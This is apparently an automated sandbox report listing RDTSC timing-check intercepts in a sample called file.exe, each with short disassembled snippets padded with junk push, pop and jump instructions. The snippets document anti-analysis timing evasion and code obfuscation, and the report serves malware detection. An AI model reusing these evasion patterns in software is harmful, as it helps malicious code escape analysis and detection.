Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB1B05 second address: EB1B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F450CC4AB28h 0x00000010 jmp 00007F450CC4AB1Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB1B33 second address: EB1B3D instructions: 0x00000000 rdtsc 0x00000002 je 00007F450CC4A606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB1CB7 second address: EB1CC1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F450CC4AB1Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB1CC1 second address: EB1CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F450CC4A611h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB1CDC second address: EB1CF2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F450CC4AB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F450CC4AB16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB1CF2 second address: EB1D0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A615h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB1D0B second address: EB1D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB68DD second address: EB68E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB68E1 second address: EB68E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB68E7 second address: EB68F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB68F2 second address: EB68F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB6A58 second address: EB6A62 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F450CC4A606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB6A62 second address: EB6A7C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F450CC4AB24h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB6A7C second address: EB6A86 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F450CC4A606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB74A8 second address: EB74C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4AB27h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB74C3 second address: EB74C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EB74C7 second address: EB74CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E15A85 second address: E15A9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A612h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E15A9B second address: E15AAC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E15AAC second address: E15AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F450CC4A611h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F450CC4A60Eh 0x00000010 jp 00007F450CC4A60Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC116D second address: EC1173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC1173 second address: EC1182 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F450CC4A606h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC1182 second address: EC11AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F450CC4AB16h 0x0000000a jg 00007F450CC4AB16h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F450CC4AB27h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC11AD second address: EC11B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F450CC4A606h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC11B9 second address: EC11BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC17B5 second address: EC17BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC17BA second address: EC17BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC17BF second address: EC17C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC17C5 second address: EC17CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC1FCE second address: EC1FF0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F450CC4A606h 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jmp 00007F450CC4A60Dh 0x00000012 jp 00007F450CC4A606h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC79FE second address: EC7A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC7A02 second address: EC7A1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A614h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC911B second address: EC9121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECC59C second address: ECC5BD instructions: 0x00000000 rdtsc 0x00000002 js 00007F450CC4A606h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F450CC4A612h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECC5BD second address: ECC5C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECC5C3 second address: ECC5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F450CC4A606h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECC5CE second address: ECC5D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECC5D4 second address: ECC5D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECC716 second address: ECC72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4AB24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ECCB65 second address: ECCB86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F450CC4A60Eh 0x00000011 jno 00007F450CC4A606h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3B3E second address: ED3B49 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3CA1 second address: ED3CAD instructions: 0x00000000 rdtsc 0x00000002 js 00007F450CC4A606h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3CAD second address: ED3CD6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007F450CC4AB16h 0x00000009 jmp 00007F450CC4AB27h 0x0000000e pop ecx 0x0000000f jnp 00007F450CC4AB22h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3CD6 second address: ED3CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3E39 second address: ED3E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3E3E second address: ED3E5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A615h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3E5E second address: ED3E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED413E second address: ED414E instructions: 0x00000000 rdtsc 0x00000002 js 00007F450CC4A606h 0x00000008 jp 00007F450CC4A606h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED414E second address: ED4168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F450CC4AB16h 0x0000000a jmp 00007F450CC4AB20h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE0370 second address: EE0374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE0069 second address: EE0072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE0072 second address: EE0099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A612h 0x00000007 jp 00007F450CC4A608h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F450CC4A606h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE0099 second address: EE009D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE009D second address: EE00A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE00A7 second address: EE00AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB651 second address: EEB669 instructions: 0x00000000 rdtsc 0x00000002 js 00007F450CC4A612h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F450CC4A60Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB669 second address: EEB6A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB20h 0x00000007 jo 00007F450CC4AB16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jne 00007F450CC4AB16h 0x0000001a jg 00007F450CC4AB16h 0x00000020 push eax 0x00000021 pop eax 0x00000022 jo 00007F450CC4AB16h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d push esi 0x0000002e pop esi 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB6A3 second address: EEB6B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A610h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB6B7 second address: EEB6BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEB6BD second address: EEB6C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EED256 second address: EED25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EED25A second address: EED25E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EED25E second address: EED26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 je 00007F450CC4AB16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F046F5 second address: F046F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F046F9 second address: F046FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F046FF second address: F04705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04705 second address: F0470D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0470D second address: F04711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F05FBD second address: F05FC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0A18A second address: F0A196 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F450CC4A606h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0A196 second address: F0A19C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0AA92 second address: F0AABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jmp 00007F450CC4A619h 0x0000000e pop ecx 0x0000000f jo 00007F450CC4A614h 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DBD9 second address: F1DBDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DBDF second address: F1DBE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DBE3 second address: F1DBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1C2AF second address: F1C2B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1C2B3 second address: F1C2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2C06A second address: F2C0AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F450CC4A614h 0x0000000e jl 00007F450CC4A624h 0x00000014 jmp 00007F450CC4A618h 0x00000019 jne 00007F450CC4A606h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2BF2D second address: F2BF32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F301E5 second address: F301F1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F450CC4A60Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2FF19 second address: F2FF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E1E0C6 second address: E1E0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F450CC4A617h 0x00000009 jmp 00007F450CC4A60Fh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F44528 second address: F4452C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4452C second address: F44532 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4491E second address: F4492A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F47E29 second address: F47E33 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F450CC4A60Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F47E33 second address: F47E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48139 second address: F48143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F450CC4A606h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48143 second address: F48147 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F48438 second address: F4845B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F450CC4A60Ch 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F450CC4A608h 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4963A second address: F4963E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4963E second address: F49644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F49644 second address: F4964D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F4CDA7 second address: F4CDB1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F450CC4A606h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: E5FAA6 second address: E5FABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0314 second address: 55D0319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D0319 second address: 55D032A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4AB1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D032A second address: 55D03B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4A611h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushfd 0x0000000f jmp 00007F450CC4A613h 0x00000014 or ax, D4BEh 0x00000019 jmp 00007F450CC4A619h 0x0000001e popfd 0x0000001f pop eax 0x00000020 pushfd 0x00000021 jmp 00007F450CC4A611h 0x00000026 and cx, BEF6h 0x0000002b jmp 00007F450CC4A611h 0x00000030 popfd 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 pushad 0x00000035 movzx ecx, di 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F450CC4A60Fh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D03B9 second address: 55D03F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F450CC4AB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov edx, dword ptr [ebp+0Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F450CC4AB27h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D03F2 second address: 55D040A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F450CC4A614h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D040A second address: 55D040E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0694 second address: 55F0698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F0698 second address: 55F069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55F069C second address: 55F06A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
